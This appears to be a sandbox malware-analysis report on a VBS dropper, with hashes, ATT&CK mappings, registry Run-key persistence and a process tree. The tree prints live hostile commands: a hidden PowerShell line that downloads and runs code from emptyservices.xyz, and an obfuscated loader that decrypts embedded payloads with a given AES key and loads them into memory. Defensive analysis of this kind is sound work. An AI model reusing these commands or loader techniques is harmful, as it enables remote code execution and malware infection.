b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5

General

Target

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5.vbs
Size

67KB
MD5

0eccd58bd629893c13a11881a4707538
SHA1

0c6eb5b4ca3e92c44ea8b8e9d0841189aeb7d554
SHA256

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5
SHA512

25a8c044df81bd1e953922f897616eacb615e68e1a0e33d7606c1f4f42913c62826090e5ac4d9a7a62c20284c7206182df3b9999b7704aed692d7933015608b8
SSDEEP

1536:hvakp9tDsWXM2yd+DeYq4Vi5QBCOXU3T18Foc:tJTZrXw+i++cCOXAjc

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2696	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2696	powershell.exe
2996	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2996	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 2696	2144	WScript.exe	30
PID 2144 wrote to memory of 2696	2144	WScript.exe	30
PID 2144 wrote to memory of 2696	2144	WScript.exe	30
PID 2144 wrote to memory of 2640	2144	WScript.exe	32
PID 2144 wrote to memory of 2640	2144	WScript.exe	32
PID 2144 wrote to memory of 2640	2144	WScript.exe	32
PID 2640 wrote to memory of 940	2640	cmd.exe	34
PID 2640 wrote to memory of 940	2640	cmd.exe	34
PID 2640 wrote to memory of 940	2640	cmd.exe	34
PID 940 wrote to memory of 2520	940	cmd.exe	36
PID 940 wrote to memory of 2520	940	cmd.exe	36
PID 940 wrote to memory of 2520	940	cmd.exe	36
PID 940 wrote to memory of 2996	940	cmd.exe	37
PID 940 wrote to memory of 2996	940	cmd.exe	37
PID 940 wrote to memory of 2996	940	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5.vbs"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
      4⤵
      PID:2520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
c1cffa7be0703f50d79684e9ec4c9069

SHA1
e359431db8731b7e5966463906d6e24df8515744

SHA256
298ce1e8c043395147512b3c7f6e99b2bbfea09fd3c53a4fb34e5f384457f682

SHA512
6eece0756aaf8a65b4a425329a9d0ec0d46f2ae4d13439a453c279560ccda356a24ac501cd4b55570e2caf0dec732ed51ddb69f71cdea936d0052fa9666d258c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5837160f3159dd26bd4804c8506515f2

SHA1
2ad2f436d418e56e70c24b138d344bc389feb692

SHA256
3552d5fce0481ee7bc9fb6d32f6a9add3cf42d67a33d1f68c430bbf7775debff

SHA512
2d0172ce3566e4a9a8e99f28abcf56943172e54fba3dd2c09221db14f19d250c5802ef79f5038b77ff90402a9c1200ff0a6202976753549da0ad1a65861e926c

Download Submit
memory/2696-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2696-8-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-10-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-9-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-11-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-12-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-4-0x000007FEF653E000-0x000007FEF653F000-memory.dmp

Filesize
4KB

Download
memory/2696-7-0x000007FEF6280000-0x000007FEF6C1D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2996-28-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/2996-29-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads